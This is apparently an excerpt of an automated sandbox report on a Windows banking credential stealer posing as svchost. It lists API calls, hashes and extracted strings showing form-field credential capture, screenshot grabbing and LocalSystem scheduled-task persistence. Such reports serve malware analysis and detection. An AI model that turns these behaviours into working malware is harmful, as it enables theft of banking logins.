                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767,?,?,?,?,?,?), ref: 02658DBD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,8a99a767,?,?,?,?,?,?), ref: 02658DCB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767,?,?,?,?,?,?), ref: 02658DD6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02658E43
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269CF94,?,?,?,?,?,?), ref: 02658E6D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,0269CF94,?,?,?,?,?,?), ref: 02658E7B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269CF94,?,?,?,?,?,?), ref: 02658E86
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02663570,00000000,00000000,00000000), ref: 02658EE8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02650BE3,?,?,?,?,?,?), ref: 02658F00
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02658F11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocateCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                              • String ID: &LOGIN_AUTHORIZATION_CODE=$8A99A63B$8A99A6EF$8a99a6dd$8a99a767$8a99a7e1$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                              • API String ID: 899697972-2038118066
                                                                                                                                                                                                              • Opcode ID: d8e4d7c68a0527e0bd138617bec6b6355b73aefa5701edfad96468a68266ffb3
                                                                                                                                                                                                              • Instruction ID: 348e88d3a3994a69d3e2d7f5094d6a1c51d43c0249ab3f1e12ac3801987cf360
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8e4d7c68a0527e0bd138617bec6b6355b73aefa5701edfad96468a68266ffb3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79D13531A45264ABDB22AB289C40BEE7FE89F59B00F14458AEDC597300DF7099C5CFE1
                                                                                                                                                                                                              Function 02650940 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02650981
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02650984
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265099E
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 026509BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026509DF
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026509E2
                                                                                                                                                                                                              • memset.MSVCRT ref: 026509F7
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02650A0D
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02650A29
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02650A3C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02650A4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02650A4F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650A6A
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02650A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02650AC9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02650ACC
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650AE0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650AF0
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02650AFE
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02650B40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02650B6C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650B6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02650B7C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650B7F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650B8B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650B8E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650B9B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650B9E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650BB4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650BB7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650BC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650BC7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02650BE6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650BEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650BF8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650BFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650C07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02650C0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02650C13
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02650C16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                              • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                              • API String ID: 1808236364-2343086565
                                                                                                                                                                                                              • Opcode ID: 8587309b80510e1e81b6814278548947236b3a5dd5bd752d98aa683ab83f7e6b
                                                                                                                                                                                                              • Instruction ID: 9e1e2de8fcf076373d8b8ad364bfc846c2948aef4dc26232e099102ab71f4706
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8587309b80510e1e81b6814278548947236b3a5dd5bd752d98aa683ab83f7e6b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAA1BE71900219BBDB10DFA49C49FAFBBB8EF89714F158648FD05A7380DB71D9448BA4
                                                                                                                                                                                                              Function 02652A90 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 355memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 02652AAC
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02652AC5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02652ACC
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02652B0B
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02652B25
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02652B2F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02652BA8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02652BCE
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02652BED
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,0268FB50,00000000), ref: 02652C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02652C2A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02652C35
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02652C52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02652C84
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02652C8B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02652C9F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02652D40
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02652D51
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02652D61
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02652D72
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02652D7B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02652D82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02652D8F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02652D96
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0268FB50), ref: 02652DB1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02652DB4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0268FB50), ref: 02652DC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02652DC4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02652DE1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02652DF3
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB50), ref: 02652DFE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02652E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02652E48
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02652E5B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02652E68
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                              • String ID: 7577580Fa$757758cda$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                              • API String ID: 255608459-1351715047
                                                                                                                                                                                                              • Opcode ID: d2c32cebc1655c14b68ad51a72c02c6c882aee458dfe7aa3a555efb650c27e3f
                                                                                                                                                                                                              • Instruction ID: cd7d9b208053cb7d9946602f725b06a7a765653690d4e2ce96cbdd6c10c20688
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2c32cebc1655c14b68ad51a72c02c6c882aee458dfe7aa3a555efb650c27e3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CC1D331644351BBD7209F649CA9FAF7BA8EF88704F414A18FD869B2C0DB70D94587A2
                                                                                                                                                                                                              Function 00403560 Relevance: 65.1, APIs: 32, Strings: 5, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1561668989
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              Function 02652040 Relevance: 65.0, APIs: 34, Strings: 3, Instructions: 284filewindowmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02652053
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02652064
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 02652079
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0265208E
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 026520A8
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 026520D6
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 026520EC
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 0265215C
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0265216F
                                                                                                                                                                                                              • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0265218C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(0265255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 026521A6
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026521CD
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 026521EF
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0265255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02652209
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02652214
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0265223C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 0265224C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02652260
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02652270
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0265227F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 0265228F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 026522A3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 026522B3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026522CC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 026522DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 026522EE
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 026522FD
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 02652308
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0265230F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02652323
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02652335
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02652340
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0265234C
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02652358
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorHandleObjectPointerTokenWrite$CloseCompatibleCurrentFreeOpenProcessReleaseThread$AdjustAllocBitmapBitsConvertCursorDeleteErrorInfoInformationLastLocalLookupNamedPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                              • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 532523266-808120212
                                                                                                                                                                                                              • Opcode ID: eb14b49e7eb6849ae1a113431729309f9511cbc561e2ccd68944fd852b1d2d5e
                                                                                                                                                                                                              • Instruction ID: 3b52f513f0460eccbb7450c3ad2c4e22b00da0600c9e807573f3803a88495ca1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb14b49e7eb6849ae1a113431729309f9511cbc561e2ccd68944fd852b1d2d5e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF9149B2544310BFE3109F64DC98EAFBBECFB88744F415A1DFA8692240DB709945CB62
                                                                                                                                                                                                              Function 0265F9C0 Relevance: 63.3, APIs: 31, Strings: 5, Instructions: 256memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767), ref: 0265F9E8
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0269DDC8,00000000), ref: 0265FA29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265FA2F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265FA37
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0269DDC8), ref: 0265FA46
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265FA4D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0269DDC8,00000000), ref: 0265FA89
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(0269DDC8), ref: 0265FA94
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a767,?,?), ref: 0265FAD6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0269D998,00000000), ref: 0265FB11
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265FB17
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265FB1F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0269D998), ref: 0265FB2E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265FB35
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0269D998,00000000), ref: 0265FB63
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265FB69
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265FB71
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0269D998), ref: 0265FB80
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265FB87
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265FB91
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265FBC7
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 0265FC41
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 0265FC52
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 0265FC6F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265FC76
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265FC88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265FC98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265FCAA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265FCAD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265FCBA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265FCBD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 8a99a767$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\*.bk$keys\$path.txt
                                                                                                                                                                                                              • API String ID: 959110331-3809332364
                                                                                                                                                                                                              • Opcode ID: b80cd0c67275d0d999bc52061bd0d9ebffa3c93fc9a9859f6bb182d63aeb3e03
                                                                                                                                                                                                              • Instruction ID: d1aa741ef4c35775e0b9e395d0301377e6eb9c4d46ea46bd17c3bfdeeffa7cf1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b80cd0c67275d0d999bc52061bd0d9ebffa3c93fc9a9859f6bb182d63aeb3e03
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7991F030A40755AFEB11AB789C68BAE7BE8AF0B300F459655EC86D7340EF708944C791
                                                                                                                                                                                                              Function 026480C0 Relevance: 61.4, APIs: 32, Strings: 3, Instructions: 182memorysleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02647C80: IsUserAnAdmin.SHELL32 ref: 02647C8A
                                                                                                                                                                                                                • Part of subcall function 02647C80: memset.MSVCRT ref: 02647CC1
                                                                                                                                                                                                                • Part of subcall function 02647C80: memset.MSVCRT ref: 02647CD9
